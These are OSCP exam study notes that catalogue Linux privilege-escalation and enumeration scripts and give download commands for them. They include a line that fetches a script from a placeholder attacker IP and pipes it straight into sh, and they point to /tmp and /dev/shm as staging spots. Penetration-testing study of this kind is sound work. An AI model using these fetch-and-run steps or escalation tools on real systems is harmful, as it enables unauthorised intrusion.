OSCP Notes

Linux post exploitation scripts

I personally use linpeas (https://github.com/carlospolop/PEASS-ng/tree/master/linPEAS) as it's well maintained and frequently updated for the latest bugs and patches.

Words of wisdom

Be careful about which scripts you execute: auto-exploitation is totally restricted in the exam, and you are going to fail if you make this mistake, even unintentionally. ALWAYS check what you are running before executing it (pay attention to the word 'auto-exploitation' in scripts).

Execution of script

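wget -qO- http://<Attacker_IP>/<script_name> | sh | tee output.txt

# This pulls the file from the attacker box, executes it, and also stores the output in output.txt
# (-O- sends the download to stdout so it can be piped to sh; -q silences wget's progress output)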
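The "check what you are running" advice above can be made a fixed step when the script is saved to a file first instead of piped into sh. This is an added example, not part of the original notes; the function names, the keyword pattern and the two sample scripts are assumptions constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the original notes: review a script before running it.

# Assumed keyword list for illustration; extend it for the tools you use.
REVIEW_PATTERNS='auto[-_ ]?(exploit|pwn|root)'

# review_script FILE
# Prints matching lines with their line numbers.
# Returns 0 if nothing matched, 1 if hits need a manual read, 2 if unreadable.
review_script() {
    [ -r "$1" ] || { echo "cannot read: $1" >&2; return 2; }
    if grep -niE "$REVIEW_PATTERNS" "$1"; then
        return 1
    fi
    return 0
}

# run_reviewed FILE
# Runs FILE with sh only when review_script is clean; saves output to FILE.out.
run_reviewed() {
    review_script "$1" || { echo "not executed, read it first: $1" >&2; return 1; }
    rc=0
    sh "$1" > "$1.out" 2>&1 || rc=$?
    cat "$1.out"
    return "$rc"
}

# make_samples DIR: write two constructed sample scripts showing both outcomes.
make_samples() {
    cat > "$1/enum_only.sh" <<'EOF'
#!/bin/sh
# constructed sample: read-only enumeration
id
uname -a
EOF
    cat > "$1/enum_autopwn.sh" <<'EOF'
#!/bin/sh
# constructed sample: has an Auto-Exploitation mode
echo "placeholder for an automatic exploitation step"
EOF
}
```

A clean keyword scan does not replace reading the script; it only stops the obvious cases from being run by accident.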

Common locations with writable permissions to download and execute scripts

/tmp
/dev/shm

bangenum.sh (initial linux enumeration)

wget https://raw.githubusercontent.com/bngr/OSCP-Scripts/master/bangenum.sh
sed -i -e 's/\r$//' bangenum.sh
chmod +x bangenum.sh
./bangenum.sh

PSPY

What is running? Any cron jobs, any scripts? Use PSPY to find out.

https://github.com/DominicBreuker/pspy

linux-smart-enumeration

https://github.com/diego-treitos/linux-smart-enumeration

SUID search

https://github.com/Anon-Exploiter/SUID3NUM

xploit_installer.py (exploit suggester)

wget https://raw.githubusercontent.com/wwong99/pentest-notes/master/scripts/xploit_installer.py

USAGE: xploit_installer.py <exploit id>

Unix Priv checker

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh

linux-local-enum.sh

wget https://raw.githubusercontent.com/Arr0way/linux-local-enumeration-script/master/linux-local-enum.sh

linuxprivchecker.py

wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

linux-exploit-suggester.sh

wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh

unix-privesc-check.sh

wget https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh

KernelPop

Automated kernel vulnerability enumeration and exploitation

https://github.com/spencerdodd/kernelpop

Last updated 3 years ago